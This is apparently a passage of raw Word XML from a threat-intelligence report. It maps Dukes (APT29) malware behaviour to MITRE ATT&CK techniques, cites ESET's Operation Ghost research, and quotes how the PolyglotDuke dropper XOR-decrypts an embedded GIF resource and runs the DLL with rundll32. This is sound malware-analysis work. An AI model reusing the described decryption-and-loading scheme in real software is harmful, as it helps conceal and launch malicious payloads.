            <w:r w:rsidRPr="00AA5C01">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA5C01">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Deobfuscate</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA5C01">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>/Decode Files or Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="653" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69DDAB8E" w14:textId="3A52F2AD" w:rsidR="00BA18C2" w:rsidRDefault="0026410D" w:rsidP="00BA18C2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="780B490A" w14:textId="77777777" w:rsidR="00BA18C2" w:rsidRPr="00743E00" w:rsidRDefault="00BA18C2" w:rsidP="00BA18C2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="640" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63FDF865" w14:textId="48D6CDD2" w:rsidR="00BA18C2" w:rsidRDefault="00BA18C2" w:rsidP="00BA18C2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="865" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="212F2CF6" w14:textId="521B3A8D" w:rsidR="00BA18C2" w:rsidRPr="00743E00" w:rsidRDefault="00477434" w:rsidP="00BA18C2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2938" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29DC8CEB" w14:textId="7D5E93B0" w:rsidR="00BA18C2" w:rsidRDefault="00BA18C2" w:rsidP="00BA18C2">
            <w:r>
              <w:t>[1] Decode and decrypt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A52F7" w:rsidRPr="00743E00" w14:paraId="25AD96A0" w14:textId="77777777" w:rsidTr="00B1179F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="363810D0" w14:textId="298545AD" w:rsidR="007A52F7" w:rsidRDefault="00D447BB" w:rsidP="00BA18C2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="0026410D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1719" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1FE9D0C2" w14:textId="13B10DD9" w:rsidR="007A52F7" w:rsidRPr="00AA5C01" w:rsidRDefault="00D447BB" w:rsidP="00BA18C2">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0002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2355" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67FA6A1B" w14:textId="4049C1E5" w:rsidR="007A52F7" w:rsidRPr="00AA5C01" w:rsidRDefault="00D447BB" w:rsidP="00BA18C2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D447BB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1059.003 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D447BB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:Windows Command Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="653" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CC58087" w14:textId="4C99A212" w:rsidR="007A52F7" w:rsidRDefault="00D447BB" w:rsidP="00BA18C2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="0026410D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FE0720B" w14:textId="77777777" w:rsidR="007A52F7" w:rsidRPr="00743E00" w:rsidRDefault="007A52F7" w:rsidP="00BA18C2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="640" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3083CFE9" w14:textId="37072AF4" w:rsidR="007A52F7" w:rsidRDefault="00D447BB" w:rsidP="00BA18C2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="865" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BCBF529" w14:textId="0942A048" w:rsidR="007A52F7" w:rsidRPr="00743E00" w:rsidRDefault="00C60E10" w:rsidP="00BA18C2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2938" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A8905BA" w14:textId="3B968C77" w:rsidR="007A52F7" w:rsidRDefault="00D447BB" w:rsidP="00BA18C2">
            <w:r>
              <w:t>[1] Execute command</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F7AC2" w:rsidRPr="00743E00" w14:paraId="2F192171" w14:textId="77777777" w:rsidTr="00B1179F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C826836" w14:textId="22F30087" w:rsidR="007F7AC2" w:rsidRDefault="00E72A0A" w:rsidP="00BA18C2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="0026410D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1719" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71E4A107" w14:textId="374D1F65" w:rsidR="007F7AC2" w:rsidRDefault="00E72A0A" w:rsidP="00BA18C2">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0010 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2355" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B027955" w14:textId="03946A30" w:rsidR="007F7AC2" w:rsidRPr="00D447BB" w:rsidRDefault="0032214D" w:rsidP="00BA18C2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0032214D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0032214D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1041</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0032214D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Exfiltration Over C2 Channel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="653" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58F5B261" w14:textId="2D7B8C25" w:rsidR="007F7AC2" w:rsidRDefault="00E72A0A" w:rsidP="00BA18C2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="0026410D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64C920DB" w14:textId="77777777" w:rsidR="007F7AC2" w:rsidRPr="00743E00" w:rsidRDefault="007F7AC2" w:rsidP="00BA18C2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="640" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12FE67CC" w14:textId="1B607962" w:rsidR="007F7AC2" w:rsidRDefault="00E72A0A" w:rsidP="00BA18C2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="865" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44E0C8B6" w14:textId="44DC8B8F" w:rsidR="007F7AC2" w:rsidRPr="00743E00" w:rsidRDefault="00E72A0A" w:rsidP="00BA18C2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>AO-EXF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2938" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E80D285" w14:textId="7EE51EE8" w:rsidR="007F7AC2" w:rsidRDefault="00E72A0A" w:rsidP="00BA18C2">
            <w:r>
              <w:t>[1] See ATT&amp;CK Techniques</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E72A0A" w:rsidRPr="00743E00" w14:paraId="520624AD" w14:textId="77777777" w:rsidTr="00B1179F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="748D38E1" w14:textId="2FF2A97A" w:rsidR="00E72A0A" w:rsidRDefault="00E72A0A" w:rsidP="00BA18C2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1719" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68CBFCFB" w14:textId="77777777" w:rsidR="00E72A0A" w:rsidRDefault="00E72A0A" w:rsidP="00BA18C2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2355" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74B52317" w14:textId="77777777" w:rsidR="00E72A0A" w:rsidRPr="00D447BB" w:rsidRDefault="00E72A0A" w:rsidP="00BA18C2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="653" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64101780" w14:textId="77777777" w:rsidR="00E72A0A" w:rsidRDefault="00E72A0A" w:rsidP="00BA18C2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="586263F0" w14:textId="77777777" w:rsidR="00E72A0A" w:rsidRPr="00743E00" w:rsidRDefault="00E72A0A" w:rsidP="00BA18C2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="640" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51A0D13E" w14:textId="77777777" w:rsidR="00E72A0A" w:rsidRDefault="00E72A0A" w:rsidP="00BA18C2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="865" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2188164F" w14:textId="77777777" w:rsidR="00E72A0A" w:rsidRPr="00743E00" w:rsidRDefault="00E72A0A" w:rsidP="00BA18C2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2938" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CCCA5EB" w14:textId="77777777" w:rsidR="00E72A0A" w:rsidRDefault="00E72A0A" w:rsidP="00BA18C2"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0A7DCFFC" w14:textId="77777777" w:rsidR="00F26597" w:rsidRPr="0077286F" w:rsidRDefault="00F26597" w:rsidP="00F26597"/>
    <w:p w14:paraId="17A09F50" w14:textId="77777777" w:rsidR="00F26597" w:rsidRPr="00C94979" w:rsidRDefault="00F26597" w:rsidP="00F26597"/>
    <w:p w14:paraId="080C8358" w14:textId="77777777" w:rsidR="00F26597" w:rsidRDefault="00F26597" w:rsidP="00F26597">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63176F8A" w14:textId="198AAF46" w:rsidR="00F26597" w:rsidRDefault="00F26597" w:rsidP="00F26597">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:hyperlink r:id="rId61" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>ESET_Operation_Ghost_Dukes.pdf (welivesecurity.com)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t xml:space="preserve"> [2019]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7872C51A" w14:textId="2AEB3F72" w:rsidR="00DF3093" w:rsidRDefault="00DF3093" w:rsidP="00F26597">
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">[2] </w:t>
      </w:r>
      <w:hyperlink r:id="rId62" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>FatDuke</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>, Software S0512 | MITRE ATT&amp;CK®</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEDB568" w14:textId="3B215F22" w:rsidR="000D69C8" w:rsidRPr="00DF3093" w:rsidRDefault="000D69C8" w:rsidP="00F26597">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[3] </w:t>
      </w:r>
      <w:hyperlink r:id="rId63" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>MiniDuke</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>, Software S0051 | MITRE ATT&amp;CK®</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1F1E3B5C" w14:textId="77777777" w:rsidR="00F26597" w:rsidRDefault="00F26597" w:rsidP="00B86816"/>
    <w:p w14:paraId="049B3641" w14:textId="77777777" w:rsidR="0035090E" w:rsidRDefault="0035090E">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>[1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E128728" w14:textId="10F58F07" w:rsidR="00943C83" w:rsidRDefault="00943C83"/>
    <w:p w14:paraId="14C6B0CF" w14:textId="77777777" w:rsidR="00943C83" w:rsidRDefault="00943C83"/>
    <w:p w14:paraId="056E5D24" w14:textId="77777777" w:rsidR="00943C83" w:rsidRDefault="00943C83" w:rsidP="00943C83">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31335A6A" w14:textId="35A7E7A4" w:rsidR="00943C83" w:rsidRPr="00943C83" w:rsidRDefault="00943C83" w:rsidP="00943C83">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00943C83">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Dropper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A207339" w14:textId="77777777" w:rsidR="00943C83" w:rsidRDefault="00943C83" w:rsidP="00943C83">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00943C83">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PolyglotDuke’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00943C83">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> dropper</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> embeds an encrypted </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PolyglotDuke</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> within a resource type named GIF with the </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F10119" w14:textId="77777777" w:rsidR="00943C83" w:rsidRDefault="00943C83" w:rsidP="00943C83">
      <w:r>
        <w:t xml:space="preserve">ID 129. The resource is encrypted with the following algorithm, using the string GIF89 from the resource </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC404CB" w14:textId="77777777" w:rsidR="00943C83" w:rsidRDefault="00943C83" w:rsidP="00943C83">
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>which</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is the 5 first magic bytes of the start of the GIF header) as the key:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F8C6B3" w14:textId="77777777" w:rsidR="00943C83" w:rsidRDefault="00943C83" w:rsidP="00943C83">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>clearText</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>] = (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> / 5) ^ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cypherText</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>] ^ aGif89[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> % 5]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EB8A88" w14:textId="77777777" w:rsidR="00943C83" w:rsidRDefault="00943C83" w:rsidP="00943C83">
      <w:r>
        <w:t>After decryption, the DLL is written to the current working directory and executed using rundll32.exe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2E6484" w14:textId="77777777" w:rsidR="00943C83" w:rsidRDefault="00943C83" w:rsidP="00943C83">
      <w:r>
        <w:t xml:space="preserve">The custom string encryption algorithm used by the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PolyglotDuke</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> dropper is identical to the one used by </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD2DF04" w14:textId="77777777" w:rsidR="00943C83" w:rsidRDefault="00943C83" w:rsidP="00943C83">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PolyglotDuke</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, as well as other samples from previous Dukes campaigns, and is depicted in Figure 7.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C265BC" w14:textId="77777777" w:rsidR="00943C83" w:rsidRDefault="00943C83" w:rsidP="00943C83">
      <w:r>
        <w:t xml:space="preserve">As mentioned in section 3.2, it’s worth noting that this dropper shares a great deal of functionality with </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC5A980" w14:textId="77777777" w:rsidR="00943C83" w:rsidRDefault="00943C83" w:rsidP="00943C83">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>OnionDuke</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, such as the use of a GIF resource, the use of the same algorithm with the string GIF89 as key to </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8F2930" w14:textId="77777777" w:rsidR="00F7052A" w:rsidRDefault="00943C83" w:rsidP="00943C83">
      <w:r>
        <w:t xml:space="preserve">decrypt the resource, and the use of the same custom encryption algorithm to encrypt the strings </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D12C378" w14:textId="77777777" w:rsidR="00F7052A" w:rsidRDefault="00F7052A" w:rsidP="00943C83"/>
